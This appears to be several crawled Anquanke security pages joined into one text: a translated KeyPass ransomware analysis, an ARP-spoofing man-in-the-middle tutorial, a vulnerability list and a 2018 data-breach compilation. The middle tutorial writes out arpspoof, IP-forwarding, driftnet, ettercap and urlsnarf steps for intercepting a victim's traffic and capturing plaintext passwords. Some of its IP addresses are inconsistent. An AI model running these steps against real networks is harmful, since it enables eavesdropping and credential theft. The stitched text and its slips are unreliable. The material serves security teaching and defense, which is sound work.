常见命令执行函数
ctf绕过的小tip
处理无回显的命令执行
后记
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 0daybank

全新勒索病毒爆发

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
正在爆发的勒索病毒-KeyPass
阅读量 154278 | 稿费 100

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-08-14 17:00:37
译文声明
本文是翻译文章,文章原作者,文章来源:securelist.com
原文地址:https://securelist.com/keypass-ransomware/87412/

译文仅供参考,具体内容表达以及含义原文为准

×

前记
在过去的几天里,我们软件的反勒索模块一直在检测恶意软件的新变种:KeyPass勒索软件。安全社区的其他人也注意到这个勒索软件在8月份开始肆虐传播:

传播方式
根据我们搜集到的信息,分析出该恶意软件通过下载软件勒索模块的虚假安装程序进行传播。

描述
木马样例使用C++编写,并在MS Visual Studio中编译。它是使用MFC库,Boost和Crypto ++开发的。其PE头中包含最近的编译日期。

当在受害者的计算机上启动时,木马会将其可执行文件复制到%LocalAppData%并启动它。然后它将自己在原始位置删除。
之后,它会生成自己进程的多个副本,并将加密密钥和受害者ID作为命令行中的参数进行传递。
KeyPass可从受感染的计算机本地驱动器和网络共享进行枚举,并搜索所有文件,无论其扩展名是什么。它会跳过位于多个目录中的文件,这些目录的路径将被硬编码到样例中。
每个加密文件都会被添加一个额外的扩展名:.KEYPASS,同时名为!!!KEYPASS_DECRYPTION_INFO!!!.txt的赎金票据将会被保存在每一个目录中

加密方案
该木马的开发人员使用了一个非常简单的方案:恶意软件在CFB模式下使用对称算法AES-256,对所有文件使用0 IV和相同的32字节密钥。木马在每个文件的开头加密最多0x500000字节(5 MB)的数据。
启动后不久,KeyPass连接到其命令控制服务器(C&C),并接收当前受害者的加密密钥和感染ID。数据以JSON的形式通过纯HTTP传输。
如果C&C无法访问(例如,如果受感染的计算机未连接到互联网或服务器已关闭),则木马使用硬编码密钥和ID,这意味着在离线加密的情况下,受害者文件的解密将变得没有意义。

GUI
从我们的角度来看,KeyPass木马最有趣的功能是能够采用“手动控制”。木马包含一个默认隐藏的表单,在按下键盘上的特殊按钮后可以显示该表单。此功能可能表明木马背后的犯罪分子打算在必要时手动操作它。

此表单允许攻击者通过更改以下参数来自定义加密过程:

加密密钥
赎金票据的名称
赎金票据文本内容
受害者的ID
加密文件的扩展名
要从加密中排除的路径列表

受感染位置

本文翻译自 securelist.com, 原文链接 。如若转载请注明出处。
安全资讯 恶意软件 勒索软件 KeyPass

一叶飘零 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

PHP反序列化入门之寻找POP链(一)
2019-02-26 11:00:59

【缺陷周话】第23期:双重检查锁定
2019-02-26 10:00:40

2019安恒2月月赛Writeip-Web&Crypto&Misc
2019-02-25 16:00:20

安恒杯2019年2月月赛pwn部分详细分析
2019-02-25 15:30:46
|发表评论
发表你的评论吧
昵称
神奇小子
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
一叶飘零
个人博客:skysec.top
文章
50
粉丝
107
TA的文章
2019安恒2月月赛Writeip-Web&Crypto&Misc
2019-02-25 16:00:20
2019安恒1月月赛Writeip-Web&Crypto&Misc
2019-01-27 11:00:54
JavaScript侧信道时间测量
2019-01-27 10:30:24
2018安恒杯11月赛-Web&Crypto题解
2018-11-26 10:02:02
当中国剩余定理邂逅RSA
2018-11-21 15:50:18
输入关键字搜索内容
相关文章
2月26日每日安全热点 – 首个完整利用WinRAR漏洞传播的恶意样本分析
2月25日每日安全热点 – 地下情报如何拯救金融服务行业
2月24日每日安全热点 – 小米手机内核开源
事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
2月23日每日安全热点 – 18年成人网站出售账户信息广告增长一倍
预警 | 部分云上用户中招 watchdogs 感染性挖矿病毒
从RSA 2019创新沙盒“十强”看网络安全技术动向
热门推荐
文章目录
前记
传播方式
描述
加密方案
GUI
受感染位置
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

arp欺骗

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
浅谈Arp攻击和利用Arp欺骗进行MITM
阅读量 108624 | 评论 4 稿费 300

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-07-16 17:00:43

索引
arp欺骗也是很古老的渗透手段了,主要起着信息收集的作用,比如你可以利用欺骗获取对方的流量,从流量分析你认为重要的信息,例如某某账号密码。或是利用Arp攻击,切断局域网内某一用户的网络访问(单向欺骗)。下面着重讲一下中间人攻击的原理,配和实战演练分析,不对的地方,还请大家多多反馈和包涵!

MITM
借用Wiki百科的一个比喻来理解MITM(中间人攻击):

假设爱丽丝(Alice)希望与鲍伯(Bob)通信。同时,马洛里(Mallory)希望拦截窃会话以进行窃听并可能在某些时候传送给鲍伯一个虚假的消息。

首先,爱丽丝会向鲍勃索取他的公钥。如果Bob将他的公钥发送给Alice,并且此时马洛里能够拦截到这个公钥,就可以实施中间人攻击。马洛里发送给爱丽丝一个伪造的消息,声称自己是鲍伯,并且附上了马洛里自己的公钥(而不是鲍伯的)。
爱丽丝收到公钥后相信这个公钥是鲍伯的,于是爱丽丝将她的消息用马洛里的公钥(爱丽丝以为是鲍伯的)加密,并将加密后的消息回给鲍伯。马洛里再次截获爱丽丝回给鲍伯的消息,并使用马洛里自己的私钥对消息进行解密,如果马洛里愿意,她也可以对消息进行修改,然后马洛里使用鲍伯原先发给爱丽丝的公钥对消息再次加密。当鲍伯收到新加密后的消息时,他会相信这是从爱丽丝那里发来的消息。
我们的身份就是Mallory,我们希望欺骗Alice和Bob,让其认为我们是交互的正确目标,从而来获取他们之间交流的信息。

Arp攻击分析
想要进行中间人攻击,先理解最基础的arp攻击

Arp协议
ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。

以太网(局域网)进行信息传输时,不是根据IP地址进行通信,因为IP地址是可变的,用于通信是不安全的。然而MAC地址是网卡的硬件地址,一般出厂后就具有唯一性。ARP协议就是将目标IP地址解析成MAC地址进行验证通信。

Arp通信过程
每台主机都会在自己的ARP缓冲区建立一个ARP列表(生命周期二十分钟),用于表示IP地址和MAC地址的对应关系。
主机A若想和主机B通信,首先主机A会查询Arp缓存表(后面称ip-mac缓存表)是否有B主机对应的ip-mac,有的话就将B主机的mac地址封装到数据包发送。若没有的话,主机A会向以太网发送一个Arp广播包,告诉以太网内的所有主机自己的ip-mac,并请求B主机(以ip来表示B主机)的mac地址。当B主机收到Arp广播包后,确认A主机是想找自己的mac地址,就会对A主机进行回应一个自己的mac地址。A主机就会更新自己的ip-mac缓存表,同时B主机也会接收A主机的ip-mac对应关系到自己的ip-mac缓存表。
Arp协议缺陷
ARP协议信任以太网所有的节点,效率高但是不安全。这份协议没有其它字协议来保证以太网内部信息传输的安全,它不会检查自己是否接受或发送过请求包,只要它就收到的arp广播包,他就会把对应的ip-mac更新到自己的缓存表

网关的理解
在wiki中这样定义网关:

在计算机网络中,网关(英语:Gateway)是转发其他服务器通信数据的服务器,接收从客户端发送来的请求时,它就像自己拥有资源的源服务器一样对请求进行处理。有时客户端可能都不会察觉,自己的通信目标是一个网关

区别于路由器(由于历史的原因,许多有关TCP/IP的文献曾经把网络层使用的路由器(英语:Router)称为网关,在今天很多局域网采用都是路由来接入网络,因此现在通常指的网关就是路由器的IP),经常在家庭中或者小型企业网络中使用,用于连接局域网和Internet。

网关也经常指把一种协议转成另一种协议的设备,比如语音网关。

网关可以把内网ip转化为外网ip,从而向服务器发出请求。也可以把外网Ip获得的数据包转换成内网ip发给内网主机。

Arp攻击原理
根据以上说的arp协议缺陷,如果我们冒充网关主机C,不停的向以太网发送自己的ARP广播包,告知自己的ip-mac,此时其它主机就会被欺骗,更新我们C的ip-mac为网关主机的ip-mac,那么其它主机的数据包就会发送到C主机上,因为没有发给真正的网关,就会造成其它主机的网络中断。

Arp攻击实操
环境
攻击主机A:Kali—>ip: 192.168.11.106
被攻击主机B: windows 7—>ip: 192.168.11.105
网关主机C: 192.168.11.1

我的Kali是在虚拟机下,需要Bridge连接保证机器在同一网段,很多人用Nat连接来转发,在实战的轻快下,需要更改虚拟机的网络配置。

网络配置如图:

实操
这里模拟真实环境,攻击主机A和被攻击主机B在同一局域网下。
1. 先用命令查看一下ip是否正确:
Kali:

可以看到ip是192.168.11.106
Windows7:

ip是192.168.11.105,网关地址是192.108.11.1
2. 用nmap查看当前网端的活跃主机

nmap -sF 192.168.11.0/24

扫描得到如图活跃主机,可以看到我们的主机B。当然获取Ip的途径不可能这么简单,你也可以用fping的方法来分析,之前我用fping探测局域网windows10的主机,发现Ping不通,win10防火墙还是有点东西。不过你可以根据fping的发送包来推断主机是否真正存活,具体可以google一下fping的用法,这里给推荐一个链接

Kali信息收集:Fping

3. 检查被攻击主机是否可以正常上网

百度正常访问

4. 利用Arpspoof进行欺骗攻击
Kali自带的Arpspoof可以很好的进行欺骗,man arpspoof查看官网手册(网上翻译):

名字
arpspoof # 截获交换局域网中的数据包

用法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

描述
# arpspoof通过伪造的ARP响应包改变局域网中从目标主机(或所有主机)到另一个主机(host)的数据包转发路径。这是交换局域网中嗅探网络流量的一种极为有效的方法。内核IP转发(或如fragrouter这样的、用户层面的、能完成同样功能的软件)必须提前开启。

参数
-i interface
# 指定要使用的接口(即指定一块网卡)

-c own|host|both
# 指定在恢复ARP配置时使用的硬件地址;当在清理(cleaning up)时,数据包的源地址可以用自己的也可以用主机(host)的硬件地址。使用伪造的硬件地址可能导致某些配置下的交换网络、AP网络或桥接网络通信中断,然而它比起默认值————使用自己的硬件地址要工作地更为可靠。

-t target
# 指定一个特殊的、将被ARP毒化的主机(如果没有指定,则认为是局域网中所有主机)。重复可以指定多个主机。

-r
# 毒化两个主机(目标和主机(host))以捕获两个方向的网络流量。(仅仅在和-t参数一起使用时有效)

host #你想要截获数据包的主机 (通常是网关)。
5. 主机A作为网关主机欺骗
命令语句

arpspoof -i eth0 -t 192.168.11.105 192.168.1.1

执行命令,Kali会向主机B发送ARP响应包,响应包的内容是Kali的ip-mac地址,而响应包里的ip则是网关主机ip地址。每一行代表一个响应包。从左到右:自己Kali的mac、主机B的mac、帧类型码(0806,代表ARP包)、包大小、包内容。

6. 被攻击主机B网络中断
我们在B主机用arp -a查看一下是否欺骗成功

可以看到,网关主机C和攻击者主机A的mac地址相同,欺骗成功

在kali终端输入control + c 可以停止,清空并恢复原来正确的arp相应包,主机重新恢复联网状态

基于Arp攻击理解下的MITM
在前面Arp成功进行攻击后,我们开始作为中间人进行欺骗,需要设置ip转发,获取目标主机B的流量,其后配合其它工具(drifnet)等进行进一步嗅探。

值得一提的是,我们的Arp攻击也是欺骗,但它是单向欺骗,冒充网关主机来欺骗目标主机。实际中,中间人攻击一般是双向欺骗。即作为中间人,主机A双向欺骗主机B与C获得通信内容,但是不破坏通信数据的传输。为了不影响B与C传输的数据丢失,主机A开启ip转发,开启后来自B主机的数据包经过A主机的Kali后转发给主机C。欺骗两个主机B和C后,我们就能嗅探到双向数据包。

如果你的kali在虚拟机,那么以下步骤均需要一个外置的usb无线网卡。在虚拟机中,网络的连接比较复杂,而Ip转发很大程度上取决于网卡性能。如果你是在虚拟机中Kali进行转发,基本都会失败,因为笔记本的内置无限网卡满足不了需求。由于放假在家我的usb无线网卡落在了寝室..下面仅以文字给大家介绍攻击的思路和流程,还请见谅…….

linux的ip转发
linux因为系统安全,是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4的ip_forward中。默认为0,需要修改为1。

开启方法大致有两种:

只接进入文件修改
cd /proc/sys/net/ipv4
ls
cat ip_forward
#显示结果为0
echo 1 > ip_forward
cat ip_forward
#显示结果为1,修改成功
使用echo
# echo “1”> /proc/sys/net/ipv4/ip_forward
对网关和目标主机B的双向欺骗
这里进行一步执行,选用第二种Ip转发手段
命令如下:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward && arpspoof -i eth0 -t 192.168.11.105 -r 192.168.11.1
利用driftnet进程监控
持续保持欺骗,再重新打开一个命令终端。
输入命令:

root@kali:~# driftnet -i eth0
跳出来的drift窗口即会显示本机正在浏览的图片

使用ettercap工具获取密码
打开新的终端,输入 attercap -G 启动工具
点击Sniff -> unified sniffing,选择要抓包的网卡,默认是自己的网卡eth0,点确定
然后单击Hosts -> Scan for host,待扫描完成后再次Scan for host,此时可以看到ettercap-NG已经扫描的主机列表
选择攻击目标,点击192.168.11.105的ip地址,点击Add to Target 1 ,然后选择网关的ip地址192.168.11.1,点击Add to Target 2
明确目标攻击方式:点击Mitm -> arp poisoning -> Sniff remote connections -> 确定
开始监听:start -> Start sniffing
工具就会抓取主机B的数据包和主机C返回的数据包,分析http post请求可以判断账号密码信息。

urlsnarf:获得受害者的HTTP请求
输入命令:

root@kali:~# urlsnarf -i eth0
使用Wireshark抓包
使用Wireshark抓取所有的数据包,过滤分析不同请求,类似于ettercap。
例如,要找HTTP POST请求,过滤,查看明文密码,一般是以POST形式上传的账号密码。

关于Arp欺骗的防御

防御原理很简单,就是不让攻击者肆意表明自己就是网关主机。我们进入网关主机(路由器后台地址),网络参数一栏一般有ip与mac绑定一栏,把网关的mac地址与网关地址绑定就好了。只要确定了对应关系,当攻击者发布arp相应包时,就不会更新相应的ip-mac缓存表。

我们重新进行欺骗后,再查询B主机的arp缓存表,如图

网关主机的mac并没有被欺骗成功,我们的防御达到目的

如果想知道对方主机的ip地址其实也容易。我们在Cmd下键入命令arp -a看一下相同mac,就找到了攻击者。

总结
公共区域的wifi存在钓鱼风险
在传输数据过程中尽量使用加密程序
本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/151762
安全客 – 有思想的安全新媒体
中间人攻击 Arp攻击分析 获取流量

Hpdoger 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

安恒杯2019年2月月赛pwn部分详细分析
2019-02-25 15:30:46

CTF中32位程序调用64位代码的逆向方法
2019-02-25 14:30:40

Kerberos协议探索系列之扫描与爆破篇
2019-02-25 10:28:31

事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
2019-02-23 19:55:32
|发表评论
发表你的评论吧
昵称
你全家都是黑客
换一个
|评论列表
Ea5ter · 2018-09-18 20:13:55 1 回复
好厉害的呢

大表姐 · 2018-07-17 05:52:41 1 回复
分析的过程太过于专业和复杂,非专业人士只看结果便可,网络危险无处不在,信息安全真的很重要。

越南邻国宰相 · 2018-07-17 17:03:07 回复
安全类技术分享,这说的很详细了吧

男科圣手 · 2018-07-17 13:35:10 1 回复
这个还好吧

Hpdoger
Blog:hpdoger.me
文章
4
粉丝
6
TA的文章
FireShellCTF2019 Bad Injections解题记录
2019-01-30 12:00:44
四个实例递进php反序列化漏洞理解
2018-09-12 16:30:13
代码审计入门级DedecmsV5.7 SP2分析复现
2018-08-26 14:00:56
浅谈Arp攻击和利用Arp欺骗进行MITM
2018-07-16 17:00:43
输入关键字搜索内容
相关文章
安恒杯2019年2月月赛pwn部分详细分析
CTF中32位程序调用64位代码的逆向方法
Kerberos协议探索系列之扫描与爆破篇
热门推荐
文章目录
索引
MITM
Arp攻击分析
Arp协议
Arp通信过程
Arp协议缺陷
网关的理解
Arp攻击原理
Arp攻击实操
环境
实操
基于Arp攻击理解下的MITM
linux的ip转发
对网关和目标主机B的双向欺骗
利用driftnet进程监控
使用ettercap工具获取密码
urlsnarf:获得受害者的HTTP请求
使用Wireshark抓包
关于Arp欺骗的防御
总结
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 0daybank

漏洞平台

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
输入漏洞关键字
关键词
发布时间范围
选择开始日期

选择结束日期
漏洞平台
不限WindowsiOSAndroidWebappHardwareLinuxPHP
漏洞类型
不限缓冲区错误SQL权限许可与访问控制信息泄露路径遍历Design Error跨站脚本安全特征问题
最新漏洞列表
漏洞名称 CVE编号 漏洞平台 发布时间 更新时间
Joomla JM Car Classifieds CarAgent Templates 3.8.12 SQL Injection – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
Joomla Contact Enhanced Components 3.9.2 SQL Injection – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
News Website Script 2.0.5 SQL Injection – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
Joomla FlexiContent Components 3.2.1.15 SQL Injection – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
Joomla Matukio Events Components 7.0.15 SQL Injection – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
Joomla RD e-Tickets TicketMasterExt Components 3.5.7 SQL Injection – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
Joomla Responsive Grid for Articles Com_Grid Components 3.4.5 SQL Injection – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
Joomla SpiderCalendar Components 3.2.17 SQL Injection – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
Drupal REST Module Remote Code Execution – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
Joomla BookingCalendarForJoomla Components 3.4.0 SQL Injection – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
Joomla Furniture Virtuemart Templates 1.5 SQL Injection – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
HanYazilim Paper Submission System .NET 1.0 Shell Upload – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
Joomla Geommunity3es Components 1.4 SQL Injection – CXSecurity.com
N/A 未知 2019-02-25 2019-02-25
vepakistan SQL Injection AnD XSS Vulnerabilities – CXSecurity.com
N/A 未知 2019-02-24 2019-02-24
dipintoguitars SQL Injection – CXSecurity.com
N/A 未知 2019-02-23 2019-02-23
Tautulli 2.1.26 Cross Site Scripting – CXSecurity.com
N/A 未知 2019-02-23 2019-02-23
Micro Focus Data Protector 安全漏洞
CVE-2019-3476 未知 2019-02-21 2019-02-22
Koseven和Kohana SQL注入漏洞
CVE-2019-8979 未知 2019-02-21 2019-02-22
Linux kernel 资源管理错误漏洞
CVE-2019-8980 未知 2019-02-21 2019-02-22
FASTGate Fastweb 命令注入漏洞
CVE-2018-20122 未知 2019-02-21 2019-02-22
WaveMaker Studio 安全漏洞
CVE-2019-8982 未知 2019-02-21 2019-02-22
MDaemon Webmail 跨站脚本漏洞
CVE-2019-8983 未知 2019-02-21 2019-02-22
MDaemon Webmail 跨站脚本漏洞
CVE-2019-8984 未知 2019-02-21 2019-02-22
Netis WF2880和WF2411 缓冲区错误漏洞
CVE-2019-8985 未知 2019-02-21 2019-02-22
Linux kernel 安全漏洞
CVE-2019-8956 未知 2019-02-21 2019-02-22
Signiant Manager+Agents 缓冲区错误漏洞
CVE-2019-8996 未知 2019-02-21 2019-02-22
Tor 安全漏洞
CVE-2019-8955 未知 2019-02-21 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
Rockwell Automation Allen-Bradley PowerMonitor Multiple Security Vulnerabilities
CVE-2018-19615 CVE-2018-19616 未知 2018-11-27 2019-02-22
首页
上一页
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
下一页
尾页
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 0daybank

信息泄露

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
2018年国内外信息泄露案例汇编
阅读量 184122 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2019-02-04 14:40:16

本文作者:补天漏洞响应平台、360安服团队、360安全监测与响应中心、360威胁情报中心、360行业安全研究中心

国内机构重大数据泄露案例
一、 内部威胁
(一) 某地方卫生系统出“内鬼”泄露50多万条新生婴儿和预产孕妇信息

2018年1月,某警方侦破了一起新生婴儿信息倒卖链条。从新学婴儿数据泄露的源头来看:某社区卫生服务中心工作人员徐某,掌握了某市“妇幼信息某管理系统”市级权限账号密码,利用职务之便,多次将2016年至2017年的某市新生婴儿信息及预产信息导出。被抓获前,他累计非法下载新生婴儿数据50余万条,贩卖新生婴儿信息数万余条。

值得注意的是,在该案中,徐某仅是某市某社区卫生服务中心工作人员,却掌握了某市“妇幼信息某管理系统”市级权限账号密码。

从卫生系统“内鬼”徐某到公开出售信息的黄某,多名犯罪嫌疑人层层转手,组成了一条长长的新生婴儿信息倒卖链条。

(二) 某员工私自转让公司权限给朋友,致使30余万条医生数据泄露

2018年2月,某警方侦破了一起医生信息窃取案件。从医生数据泄露的源头来看:武某任职某企业管理咨询(上海)有限公司广州分公司移动医疗顾问一职,拥有公司某应用系统的工作权限,通过其手机二维码可进入系统,内有大量医生信息。出于朋友情面和同情心理,遂把上述权限给了卢谋。

获得权限后,卢某找来“计算机技术很好”的大学舍友温某,卢某指使温某利用该权限通过计算机技术进入应用系统后台,盗取系统内的医生信息。

截至2016年10月11日,被告人卢某、温某等人共窃取系统内的信息共计352962条。一条完整的医生信息包括姓名、手机号码、医院名称、职务及属地等。

庆幸的是,被抓获时,温某尚未把爬取到的医生信息交给卢某。

(三) 合作公司员工泄露防伪数据700万条,某知名酒企损失超百万

2018年2月,某警方侦破了知名酒被仿造的案件。从防伪数据泄露的源头来看:蔡某拿任职于某公司的“XXXX防伪溯源系统”项目专项经理,在2014年4月至2016年9月期间,曾多次利用职务之便通过拍照、直接用U盘拷贝的方式窃取某知名酒企股份有限公司防伪溯源数据,并将窃取出来的数据泄露给蔡某刚。

据法院审理查明,被蔡某拿披露数据量共计700余万条(可制作成700万瓶能够通过防伪溯源验证的假冒酒)。

但随着泄密事件发生,某知名酒企只得向其他公司重新采购防伪密管系统,并将原有防伪标签升级为安全芯片防伪标签,同时废弃前期采购的4.3万余枚防伪标签。据计算,防伪数据库的泄露直接导致该酒企 经济损失约105.7万元。

(四) 某地方公务员利用职务之便,泄露82万条公民信息

2018年3月,某法院审理了某地方公务员窃取信息案件。从公民个人数据泄露的源头来看:朱某任职于某机关单位。从2010年起,朱某利用职务便利,应朋友刘某、王某的要求,超越职权下载了一些公民个人信息,并将这些信息分别提供给他们使用,造成大量的公民个人数据泄露。

经统计,2010年4月至2016年9月,朱某向刘某提供公民个人信息70余万条,2011年11月至2016年7月,朱某向王某提供公民个人信息12余万条。

(五) 某科技公司内鬼窃取500余万条个人信息,并在网上售卖

2018年4月,某警方侦破了一起个人信息兜售案。从数据泄露的源头来看:北京某高校博士毕业马某,利用在科技公司工作的机会,以黑客技术破解公司数据库,非法盗取海量公民个人信息,包括:淘宝信息、金融信息、医疗信息、社保信息、车辆信息等,其中包括居民身份证号、家庭住址、电话号码等隐私。

此后,8人团伙在网上贩卖出售公民信息,数量达500余万条,容量达60G。目前,8名犯罪嫌疑人全部归案。

二、 外部威胁
(一) 某手机厂商称:4万消费者的信用卡数据泄露

2018年1月,某手机厂商发布声明称,4万名消费者的信用卡信息在2017年11月至2018年1月11日期间遭不明黑客盗取。

该手机厂商证实:网上支付系统遭入侵。攻击者针对其中一个系统发动攻击并将恶意脚本注入支付页面代码中窃取用户付款时输入的信用卡信息,该恶意脚本能直接从消费者浏览器窗口中捕获完整的信用卡信息,包括信用卡号、到期日期和安全代码。

然而,该手机厂商认为通过所保存的信用卡、PayPal账户或者“经由PayPal通过信用卡”方法购买手机的消费者并未受影响。

(二) 北京某教育网站遭入侵,攻击者窃取7万余元

2018年4月,朱某从一个QQ群中得知可以利用网站漏洞进入服务器后台,从而得到管理员权限,修改余额并提现的方法。而且QQ群给出了具体的链接,几乎不需要多少专业知识,一学就会。

所以,朱某在网上注册成为北京某教育科技公司网上商城的会员,利用网站漏洞进入服务器后台,对余额进行修改,打开提现功能。从2016年11月至2017年3月这几个月间,他多次从商城提现,共窃取7万余元。

(三) 多家美容医院的客户信息被窃取

2018年7月,某警方侦破了一起盗窃、贩卖美容整形医院客户信息的案件,在美容整形医院网站上植入木马,侵入服务器,盗取客户信息,层层转手后贩卖给其他美容整形医院。

从美容整形医院客户数据泄露的源头来看:苏某与蒋某制作木马病毒后,假扮美容客户向医院客服咨询,将病毒链接藏匿在整形需求图片上,发送给工作人员。工作打开图片时,服务器被植入木马,客户隐私资料即被盗取。

潘在网上发出求购美容整形客户资料广告,苏某看到后一拍即合,将其发展为下线。“黑中介”杨某某作为批量信息买主,将信息加价后再转让给末端的市场人员,由他们通过电话、网络等方式对客户直接“引流”到愿意给他们提成的医院。为了规避法律风险,他们还安排专门的中间人负责收付款,以防止黑色资金被监控。

(四) 某知名酒店集团5亿条数据泄露

2018年8月,有网民发帖称售卖华住旗下所有酒店数据,该网友在帖子中称,所有数据脱库时间是8月14日,每部分数据都提供10000条测试数据。所有数据打包售卖8比特币,按照当天汇率约合37万人民币,随后又称,要减价至1比特币出售。

事故原因疑似华住公司程序员将数据库连接方式上传至github导致其泄露,目前还无法完全得知到细节。

售卖的数据分为三个部分:

1) 华住官网注册资料,包括姓名、手机号、邮箱、身份证号、登录密码等,共53G,大约1.23亿条记录;

2) 酒店入住登记身份信息,包括姓名、身份证号、家庭住址、生日、内部 ID 号,共22.3G,约1.3亿人身份证信息;

3) 酒店开房记录,包括内部id号,同房间关联号、姓名、卡号、手机号、邮箱、入住时间、离开时间、酒店 id 号、房间号、消费金额等,共66.2G,约2.4亿条记录。

8月底,暗网上出现了某知名集团旗下多个连锁酒店客户信息数据的交易行为,数据标价8个比特币,约等于人民币35万人民币,数据泄露涉及到1.3亿人的个人信息及开房记录。9月19日消息,窃取华住旗下酒店数据信息嫌疑人已经被上海警方抓获。

(五) “XX驿站”一千万条快递数据被非法窃取

2018年9月,某省公安厅获悉破获1个非法获取公民信息团伙,抓获犯罪嫌疑人21名。而被非法窃取的信息,经警方查实均系快递数据,来源于各大高校的大学生的快递信息。这些信息包含有单号、姓名、手机号、快递公司名称等。这类信息较为敏感,且数据的准确率极高。

警方通报,该案中,犯罪团伙并非采取以往的直接网络攻击盗取模式,而是对安装在物流网点手持终端(俗称巴枪)中的“XX驿站”APP进行破解后,植入控件程序。通过相关省份“XX驿站”服务商进行推广安装后,直接通过数据回传获得数据。

截至破案,遭非法窃取的快递数据超过1000万条

(六) 某知名酒店数据库遭入侵,5亿顾客信息或泄露

2018年11月30日,某国际酒店集团(Marriott International)宣布,旗下某酒店(Starwood Hotel)的一个顾客预订数据库被黑客入侵,可能有约5亿顾客的数据泄露。这些可能被泄露的信息包括顾客的姓名、通信地址、电话号码、电子邮箱、护照号码、喜达屋VIP客户信息、出生日期、性别和其他一些个人信息。对于部分客户,可能被泄露的信息还包括支付卡号码和有效日期,但这些数据是加密的。

某知名酒店表示,调查结果显示,有一未授权方复制并加密了这些数据。而且,自2014年就开始了对其网络进行未授权访问。

国外各行业信息泄露案例
一、 IT信息企业
(一) 因AWS存储桶配置不当引起的信息泄露:

1.上万印度板球球员个人信息泄露

2018年5月,Kromtech安全中心的研究人员再次发现了两个因配置错误而在线暴露的Amazon S3存储桶。从数据的内容来看,它们似乎归属于印度板球管理委员会(Board of Control for Cricket in India,BCCI)。

